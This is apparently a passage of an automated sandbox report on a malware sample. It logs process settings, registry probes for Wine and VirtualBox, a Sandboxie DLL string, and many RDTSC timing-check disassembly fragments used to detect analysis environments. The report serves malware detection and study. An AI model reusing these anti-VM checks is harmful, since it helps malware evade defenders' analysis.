Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: rstxdhuj.exe PID: 2156, type: MEMORYSTR
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: rstxdhuj.exe, 0000000A.00000002.2005733540.0000000002591000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A42B04 second address: A42B08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A42B08 second address: A42B0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A42B0E second address: A42B14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A42B14 second address: A42B18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A42C7A second address: A42C80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A42C80 second address: A42C8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A42C8B second address: A42C91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A42C91 second address: A42C95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A42C95 second address: A42C9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A430BA second address: A430C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A430C0 second address: A430E5 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FAAAC4EBB26h 0x00000008 jmp 00007FAAAC4EBB2Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 push edx 0x00000015 pop edx 0x00000016 jnl 00007FAAAC4EBB26h 0x0000001c pop ecx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A430E5 second address: A430F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FAAAC4EC6A6h 0x0000000a jg 00007FAAAC4EC6A6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A45417 second address: A45442 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FAAAC4EBB26h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FAAAC4EBB39h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A45442 second address: A45486 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007FAAAC4EC6B4h 0x00000010 mov eax, dword ptr [eax] 0x00000012 je 00007FAAAC4EC6B9h 0x00000018 jmp 00007FAAAC4EC6B3h 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A45486 second address: A4548C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4548C second address: A454CF instructions: 0x00000000 rdtsc 0x00000002 ja 00007FAAAC4EC6A8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007FAAAC4EC6A8h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 00000015h 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 jne 00007FAAAC4EC6ACh 0x0000002b lea ebx, dword ptr [ebp+1244A2BCh] 0x00000031 xchg eax, ebx 0x00000032 push ebx 0x00000033 pushad 0x00000034 pushad 0x00000035 popad 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A45668 second address: A45676 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A45676 second address: A4567B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4567B second address: A45681 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A45681 second address: A45685 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A45761 second address: A45765 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A45765 second address: A457EA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FAAAC4EC6B9h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 xor di, D511h 0x00000018 clc 0x00000019 push 00000000h 0x0000001b mov edi, dword ptr [ebp+122D29E5h] 0x00000021 jmp 00007FAAAC4EC6ADh 0x00000026 push 0FCE4E01h 0x0000002b jmp 00007FAAAC4EC6B2h 0x00000030 xor dword ptr [esp], 0FCE4E81h 0x00000037 adc cx, 3B22h 0x0000003c push 00000003h 0x0000003e add dl, 00000000h 0x00000041 push 00000000h 0x00000043 push 00000003h 0x00000045 sub dword ptr [ebp+122D3092h], edx 0x0000004b call 00007FAAAC4EC6A9h 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 pushad 0x00000054 popad 0x00000055 pushad 0x00000056 popad 0x00000057 popad 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A457EA second address: A457F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A457F0 second address: A457F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A457F4 second address: A45819 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FAAAC4EBB26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007FAAAC4EBB2Fh 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A45819 second address: A4581F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4581F second address: A45824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A45824 second address: A4585C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jl 00007FAAAC4EC6A6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [eax] 0x00000010 jmp 00007FAAAC4EC6B3h 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FAAAC4EC6AFh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4585C second address: A45861 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A45861 second address: A45867 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A64646 second address: A6464C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6464C second address: A64651 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A647ED second address: A647F2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A64938 second address: A6493C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A64DC8 second address: A64DCE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A651B2 second address: A651CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAAC4EC6B4h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A651CD second address: A651D2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A651D2 second address: A651E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAAC4EC6AEh 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A651E9 second address: A651F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAAC4EBB2Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A651F9 second address: A65221 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c jo 00007FAAAC4EC6A6h 0x00000012 jmp 00007FAAAC4EC6ABh 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jng 00007FAAAC4EC6A6h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A65221 second address: A65225 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A65225 second address: A6524C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FAAAC4EC6B9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007FAAAC4EC6A6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6524C second address: A65250 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A653B7 second address: A653BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A653BB second address: A653C5 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FAAAC4EBB26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A653C5 second address: A653CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A65565 second address: A6556B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6556B second address: A6556F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6556F second address: A65573 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A65854 second address: A65868 instructions: 0x00000000 rdtsc 0x00000002 js 00007FAAAC4EC6A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ecx 0x0000000c jng 00007FAAAC4EC6A6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A66065 second address: A66069 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A66069 second address: A66071 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A66071 second address: A66075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A66075 second address: A660CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EC6ABh 0x00000007 jmp 00007FAAAC4EC6B6h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007FAAAC4EC6B5h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FAAAC4EC6B8h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A660CC second address: A660D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A660D0 second address: A660E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007FAAAC4EC6A6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A660E0 second address: A660E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6636E second address: A6637A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A66669 second address: A6666F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6666F second address: A66673 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A66673 second address: A66679 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3C014 second address: A3C019 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6A8A3 second address: A6A8BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EBB31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6A8BE second address: A6A8C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6AE23 second address: A6AE27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6AE27 second address: A6AE83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ecx 0x00000008 jnc 00007FAAAC4EC6ACh 0x0000000e pop ecx 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push edx 0x00000014 jmp 00007FAAAC4EC6ABh 0x00000019 pop edx 0x0000001a mov eax, dword ptr [eax] 0x0000001c pushad 0x0000001d jc 00007FAAAC4EC6BBh 0x00000023 jmp 00007FAAAC4EC6B5h 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FAAAC4EC6B6h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6AE83 second address: A6AEAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EBB39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6AEAA second address: A6AEB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A69E66 second address: A69E6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6CF3E second address: A6CF42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6CF42 second address: A6CF46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6CF46 second address: A6CF4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6CF4C second address: A6CF5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007FAAAC4EBB26h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6CF5A second address: A6CF5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A729DE second address: A729E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A729E2 second address: A72A1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FAAAC4EC6B6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jp 00007FAAAC4EC6AEh 0x00000011 pushad 0x00000012 jmp 00007FAAAC4EC6AFh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A72CF8 second address: A72D2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007FAAAC4EBB36h 0x0000000a pushad 0x0000000b popad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FAAAC4EBB2Eh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A72D2A second address: A72D2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A72D2E second address: A72D32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A72E80 second address: A72E86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A72E86 second address: A72E9E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FAAAC4EBB2Fh 0x0000000a pop edi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A732BD second address: A732C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
